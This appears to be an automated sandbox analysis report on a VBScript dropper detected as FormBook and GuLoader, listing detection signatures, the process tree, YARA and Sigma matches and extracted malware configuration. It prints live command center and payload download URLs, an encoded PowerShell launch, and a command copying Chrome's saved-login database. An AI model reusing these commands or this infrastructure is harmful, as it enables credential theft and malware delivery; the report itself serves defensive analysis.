Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name: MTIR22024323_0553381487_20220112120005.vbs
Analysis ID: 552589
MD5: 564601676bee71f5f61a44ef170d92a6
SHA1: 76fca984dab2358e66524172e04a3528f33d8e18
SHA256: 5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags: vbs

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand " MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5244 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 4540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 6256 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5460 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • cmstp.exe (PID: 3504 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
            • cmd.exe (PID: 5276 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6392 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • explorer.exe (PID: 6664 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ieinstal.exe (PID: 3232 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6084 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}

Threatname: GuLoader

{"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      System Summary:

      Sigma detected: CMSTP Execution Process Creation
      Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 3504, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5276
      Sigma detected: Suspicious Csc.exe Source File Folder
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "
      Sigma detected: Non Interactive PowerShell
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "
      Sigma detected: T1086 PowerShell Execution
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132865880383508564.6420.DefaultAppDomain.powershell

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}
      Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
      Multi AV Scanner detection for submitted file
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Yara detected FormBook
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: unknownHTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
      Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

      Networking:

      Potential malicious VBS script found (has network functionality)
      Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.jewelrystore1.com/wk3t/
      Source: Malware configuration extractorURLs: https://www.wizumiya.co.jp/html/user_da
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
      Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
      Source: unknownDNS traffic detected: queries for: www.wizumiya.co.jp
      Source: unknownHTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
      Malicious sample detected (through community Yara rule)
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "
      Potential malicious VBS script found (suspicious strings)
      Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Very long command line found
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
